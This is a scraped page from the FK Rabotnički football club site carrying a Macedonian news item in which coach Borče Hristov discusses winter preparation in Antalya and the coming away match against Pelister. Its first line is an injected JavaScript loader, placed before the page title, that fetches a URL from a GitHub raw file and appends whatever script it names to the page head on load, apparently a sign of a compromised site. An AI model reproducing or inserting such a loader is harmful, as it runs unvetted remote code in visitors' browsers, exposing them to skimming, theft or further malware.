;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Борче Христов: Работнички е подготвен за пролетните предизвици
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Борче Христов: Работнички е подготвен за пролетните предизвици

Три дена до стартот на пролетниот дел од првенството во Првата фудбалска лига. Работнички одработи квалитетни подготовки во Анталија, а шефот на стручниот штаб, Борче Христов, вели дека тимот е подготвен за новите предизвици. Зимскиот преоден рок донесе значителни промени во ростерот, па можеби ќе биде потребно уште малку време за тимот да профункционира според тренерските желби.

Сепак, в недела за Работнички претстои многу важен натпревар, гостување во Битола и дуел со Пелистер.

„Одработивме квалитетни подготовки, а во зимскиот преоден рок имаше значителни промени во составот. Верувам дека Работнички е добро подготвен за пролетниот старт, иако ние тренерите секогаш велиме дека е потребно уште малку време за добро воигрување. Но, пролетниот дел од првенството стартува и ќе треба да одговориме на предизвикот. Стартот е секогаш многу значаен, а бодовите им се многу потребни и на Работнички и на Пелистер. Ќе биде тежок натпревар, но очекувам позитивен исход за нас“, вели шефот на стручниот штаб, Борче Христов.

Натпреварот меѓу Пелистер и Работнички е закажан за в недела, со почеток во 14 часот, на стадионот „Петар Милошевски“ во Битола.